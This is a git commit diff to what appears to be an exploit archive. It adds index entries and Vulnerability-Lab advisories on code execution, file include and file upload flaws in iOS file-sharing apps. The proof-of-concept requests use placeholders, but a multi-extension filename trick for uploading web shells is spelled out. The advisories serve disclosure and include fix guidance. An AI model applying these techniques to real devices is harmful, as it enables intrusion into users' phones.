Updated 03_29_2014
This commit is contained in:
parent
b4268e8a98
commit
211b2f8394
7 changed files with 1297 additions and 1 deletions
|
@ -9467,7 +9467,7 @@ id,file,description,date,author,platform,type,port
|
||||||
10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
|
10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0
|
||||||
10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
|
10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0
|
||||||
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
|
10098,platforms/windows/remote/10098.py,"Novell eDirectory 8.8 SP5 iConsole Buffer Overflow",2009-11-16,ryujin,windows,remote,0
|
||||||
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
|
10099,platforms/windows/remote/10099.py,"HP Power Manager Administration - Universal Buffer Overflow Exploit",2009-11-16,ryujin,windows,remote,80
|
||||||
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21
|
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 (LIST) Remote Denial of Service Exploit",2007-03-20,shinnai,windows,dos,21
|
||||||
10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
|
10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0
|
||||||
10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80
|
10102,platforms/windows/dos/10102.pl,"Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit",2009-11-16,"Jeremy Brown",windows,dos,80
|
||||||
|
@ -29318,3 +29318,9 @@ id,file,description,date,author,platform,type,port
|
||||||
32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
|
32553,platforms/php/webapps/32553.txt,"phpWebSite <= 0.9.3 'links.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
|
||||||
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
|
32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro 'pages.php' SQL Injection Vulnerability",2008-10-31,"Beenu Arora",php,webapps,0
|
||||||
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
|
32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation Vulnerability",2008-10-31,NeoCoderz,windows,remote,0
|
||||||
|
32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619
|
||||||
|
32557,platforms/hardware/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
|
||||||
|
32558,platforms/hardware/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
|
||||||
|
32559,platforms/hardware/webapps/32559.txt,"Easy FileManager 1.1 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
|
||||||
|
32560,platforms/hardware/webapps/32560.txt,"ePhone Disk 1.0.2 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,hardware,webapps,8080
|
||||||
|
32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80
|
||||||
|
|
Can't render this file because it is too large.
|
163
platforms/hardware/webapps/32557.txt
Executable file
163
platforms/hardware/webapps/32557.txt
Executable file
|
@ -0,0 +1,163 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
FTP Drive + HTTP 1.0.4 iOS - Code Execution Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1231
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2014-03-20
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1231
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
9.1
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
FTP Drive + HTTP Server is the ultimate app as for usefullness and ease of use to bring with you and share all your
|
||||||
|
important files through your iPhone/iPod! When you`re in a hurry or simply wants the things done as they are supposed
|
||||||
|
to be done, you can use FTP Drive + HTTP Server. As the name implies, you can use this app mainly as an FTP Server,
|
||||||
|
so you can mount it as a Network Drive in your favorite operative system or you can browse the files through a web
|
||||||
|
browser like Firefox, Safari, Chrome, Internet Explorer, ...
|
||||||
|
|
||||||
|
(Copy of the Homepage: https://itunes.apple.com/us/app/ftp-drive-+-http-server-easiest/id455671784 )
|
||||||
|
(Vendor Homepage: http://www.gummybearstudios.com/ios.html )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory discovered a code execution web vulnerability in the official Gummy Bear Studios FTP Drive + HTTP Server v1.0.4 iOS mobile web-application.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2014-03-20: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
Critical
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
A code execution web vulnerability has been discovered in the official Gummy Bear Studios FTP Drive + HTTP Server v1.0.4 iOS mobile web-application.
|
||||||
|
The remote vulnerbaility allows an attacker to compromise the application and connected device components by usage of a system specific command execution.
|
||||||
|
|
||||||
|
The vulnerability is located in the create folder input field. The input field direct executes the input via GET method request. The request has only a simple
|
||||||
|
quotes encoding. Remote attackers are easily able to execute code by usage of a script code payload in combination with system device specific php code values.
|
||||||
|
The execution of the code occurs in the main index file dir listing service context. The attack vector is on application-side and the request method to attack
|
||||||
|
the service is GET. To bypass the path values validation it is required to first add a folder via `newDir` value. The remote attacker is able to tamper the
|
||||||
|
create new folder post method request and can intercept the values twice to attach the second manipulated path value to provoke a code execution. After the
|
||||||
|
add it is possible to attach to the already included values via create new folder to execute the code. The security risk of the remote code execution web
|
||||||
|
vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.0(+)|(-)9.1.
|
||||||
|
|
||||||
|
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
|
||||||
|
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected component compromise.
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Create New Folder
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] path value
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
The php code execution web vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST
|
||||||
|
|
||||||
|
--- PoC Session Logs [GET] ---
|
||||||
|
Status: 200[OK]
|
||||||
|
GET http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[3173] Mime Type[application/x-unknown-content-type]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost:8080]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost:8080/[CONNECTED PATH<]/?newDir=%22[<CODE EXECUTION VULNERABILITY!]#TEST]
|
||||||
|
Connection[keep-alive]
|
||||||
|
Response Header:
|
||||||
|
Accept-Ranges[bytes]
|
||||||
|
Content-Length[3173]
|
||||||
|
Date[Mi., 19 M?r. 2014 15:06:04 GMT]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
The code execution web vulnerability can be patched by a secure parse of the create new folder input field.
|
||||||
|
Adjust the encoding of the affected foldername output context value in the main index file dir list.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
The security risk of the remote code execution web vulnerability in the create new folder module is estimated as critical.
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||||||
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||||||
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||||||
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||||||
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||||||
|
or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
||||||
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||||||
|
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY RESEARCH TEAM
|
||||||
|
DOMAIN: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
|
||||||
|
|
262
platforms/hardware/webapps/32558.txt
Executable file
262
platforms/hardware/webapps/32558.txt
Executable file
|
@ -0,0 +1,262 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1233
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2014-03-21
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1233
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
7.1
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
WiFi Music lets you transfer via Wi-Fi the songs you have in your computer to any iPhone, iPod touch or iPad
|
||||||
|
in your network. No iTunes required. Now you can share them with your friends and workmates, and stream them
|
||||||
|
directly to almost any media player!
|
||||||
|
|
||||||
|
( Copy to the Vendor Homepage: https://itunes.apple.com/de/app/wifi-music/id469617062 )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory Research Team discovered multiple critical vulnerabilities in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2014-03-21: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
1.1
|
||||||
|
A local file include web vulnerability has been discovered in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
|
||||||
|
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
|
||||||
|
to compromise the web-application or mobile device.
|
||||||
|
|
||||||
|
The web vulnerability is located in the `filename` value of the `Upload File` module. Remote attackers are able to inject own files with
|
||||||
|
malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and
|
||||||
|
the request method is POST. The local file/path include execution occcurs in the main music file dir list. The security risk of the local
|
||||||
|
file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.7(+)|(-)6.8.
|
||||||
|
|
||||||
|
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with
|
||||||
|
low user auth. Successful exploitation of the local file include web vulnerability results in mobile application or connected device
|
||||||
|
component compromise.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] [POST]
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Select File > Upload
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] filename
|
||||||
|
|
||||||
|
Affected Module(s):
|
||||||
|
[+] Music File Dir List (http://localhost:8080/)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
An arbitrary file upload web vulnerability has been discovered in the official Lazybone Studios WiFi Music v1.0 iOS mobile web-application.
|
||||||
|
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
|
||||||
|
|
||||||
|
The vulnerability is located in the `upload` (video and music) module. Remote attackers are able to upload a php or js web-shells by renaming
|
||||||
|
the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name
|
||||||
|
and extension `ptest.mp3.html.php.js.aspx.mp3`. After the upload the attacker needs to open the file with the path value in the web application.
|
||||||
|
He deletes the .mp3 file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file
|
||||||
|
upload web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.7(+)|(-)7.8.
|
||||||
|
|
||||||
|
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
|
||||||
|
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] [POST]
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Select File > Upload
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] filename (multiple extensions)
|
||||||
|
|
||||||
|
Affected Module(s):
|
||||||
|
[+] Music File Dir List (http://localhost:8080/)
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The local file include web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
PoC: iChm File Management - Index
|
||||||
|
|
||||||
|
<table border="0" cellpadding="0" cellspacing="0">
|
||||||
|
<thead>
|
||||||
|
<tr><th>Name</th><th class="del">Delete</th></tr>
|
||||||
|
</thead><tbody id="filelist">
|
||||||
|
<tr><td><a href="/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E" class="file"><./[LOCAL FILE INCLUDE VULNERABILITY!]"></a></td>
|
||||||
|
<td class='del'><form action='/files/%3C[LOCAL FILE INCLUDE VULNERABILITY!]%3E' method='post'><input name='_method' value='delete'
|
||||||
|
type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr></tbody>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
|
||||||
|
Source: Vulnerable Java Script (iChm File Management - Index)
|
||||||
|
|
||||||
|
<script type="text/javascript" charset="utf-8">
|
||||||
|
var now = new Date();
|
||||||
|
$.getJSON("/files?"+ now.toString(),
|
||||||
|
function(data){
|
||||||
|
var shadow = false;
|
||||||
|
$.each(data, function(i,item){
|
||||||
|
var trclass='';
|
||||||
|
if (shadow)
|
||||||
|
trclass= " class='shadow'";
|
||||||
|
encodeName = encodeURI(item.name).replace("'", "'");
|
||||||
|
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td class='del'>
|
||||||
|
<form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=\"commit\"
|
||||||
|
type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
|
||||||
|
shadow = !shadow;
|
||||||
|
});
|
||||||
|
});
|
||||||
|
</script>
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session Logs [POST] ---
|
||||||
|
Status: 302[Found]
|
||||||
|
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost:8080]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost:8080/]
|
||||||
|
Connection[keep-alive]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------280732177711982
|
||||||
|
Content-Disposition: form-data; name="newfile"; filename="<./[LOCAL FILE INCLUDE WEB VULNERABILITY!]>"
|
||||||
|
Content-Type: image/png
|
||||||
|
|
||||||
|
Reference(s):
|
||||||
|
http://localhost:8080/[Index File Dir Listing]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The arbitrary file upload web vulnerability can be exploited by local attackers without user interaction or privileged application user account.
|
||||||
|
For security demonstration or to reproduce the file upload web vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
PoC: http://localhost:8080/files/[ARBITRARY FILE UPLOAD PATH]-ptest.mp3.html.php.js.aspx.mp3`
|
||||||
|
|
||||||
|
--- PoC Session Logs [POST] ---
|
||||||
|
Status: 302[Found]
|
||||||
|
POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost:8080]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost:8080/]
|
||||||
|
Connection[keep-alive]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------141831923231387
|
||||||
|
Content-Disposition: form-data; name="newfile"; filename="ptest.mp3.html.php.js.aspx.mp3"
|
||||||
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
|
Reference(s):
|
||||||
|
http://localhost:8080/files
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
|
||||||
|
Filter and encode also the filename output listing of the index.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks.
|
||||||
|
Implement a secure own exception-handling to restrict and disallow files with multiple extensions.
|
||||||
|
Reset the executable rights for html and php codes in the little web-server settings config for /files.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
1.1
|
||||||
|
The security risk of the local file include web vulnerability is estimated as high(-).
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||||||
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||||||
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||||||
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||||||
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||||||
|
or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
||||||
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||||||
|
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY RESEARCH TEAM
|
||||||
|
DOMAIN: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
|
||||||
|
|
250
platforms/hardware/webapps/32559.txt
Executable file
250
platforms/hardware/webapps/32559.txt
Executable file
|
@ -0,0 +1,250 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Easy FileManager 1.1 iOS - Multiple Web Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1234
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2014-03-25
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1234
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
7.9
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
This is a file management app which is very easy to use. You can manage your files under the specified directory, including copy,
|
||||||
|
cut, paste, delete, rename and create new directory. Preview the picture and play audio and video directly from the folder are supported.
|
||||||
|
This app also includes a simple FTP client. Users can use this client to connect to the remote ftp server, upload and download files from
|
||||||
|
the remote ftp server. It also includes a FTP Server and a HTTP Server. When you start the FTP Server, you can use common FTP client or
|
||||||
|
windows explorer to connect to the iphone via wifi. Also, when you start the HTTP Server, you can use internet browser to connect to the
|
||||||
|
server via wifi. It makes your iphone as a portable U disk. It’s really easyt to use this app. The function buttons are clearly. Also,
|
||||||
|
you can just long click the screen to get the action list.
|
||||||
|
|
||||||
|
(Copy of the Homepage: https://itunes.apple.com/de/app/easy-file-manager/id487524125 )
|
||||||
|
(Vendor Homepage: http://www.easytimestudio.com/ )
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory Research Team discovered multiple high severity vulnerabilities in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2014-03-25: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
Easytime Studio
|
||||||
|
Product: Easy File Manager - iOS Mobile Web Application 1.1
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
1.1
|
||||||
|
A local file include web vulnerability has been discovered in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
|
||||||
|
A file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands
|
||||||
|
to compromise the web-application or mobile device.
|
||||||
|
|
||||||
|
The web vulnerability is located in the `filename` value of the `Upload File > Send Data` module. Remote attackers are able to inject own
|
||||||
|
files with malicious `filename` value in the upload POST method request to compromise the mobile web-application. The attacker is able to
|
||||||
|
tamper the file upload POST method request to manipulate via intercept the vulnerable filename value. The request method to exploit is
|
||||||
|
POST and the attack vector is on the application-side of the wifi iOS mobile application. The local file/path include execution occcurs
|
||||||
|
in the main directory dir list. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common
|
||||||
|
vulnerability scoring system) count of 7.8(+)|(-)7.9.
|
||||||
|
|
||||||
|
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
|
||||||
|
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] [POST]
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Select File > Upload
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] filename
|
||||||
|
|
||||||
|
Affected Module(s):
|
||||||
|
[+] Directory Dir List (http://localhost:8080/)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
An arbitrary file upload web vulnerability has been discovered in the official Easytime Studio Easy File Manager v1.1 mobile web-application.
|
||||||
|
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
|
||||||
|
|
||||||
|
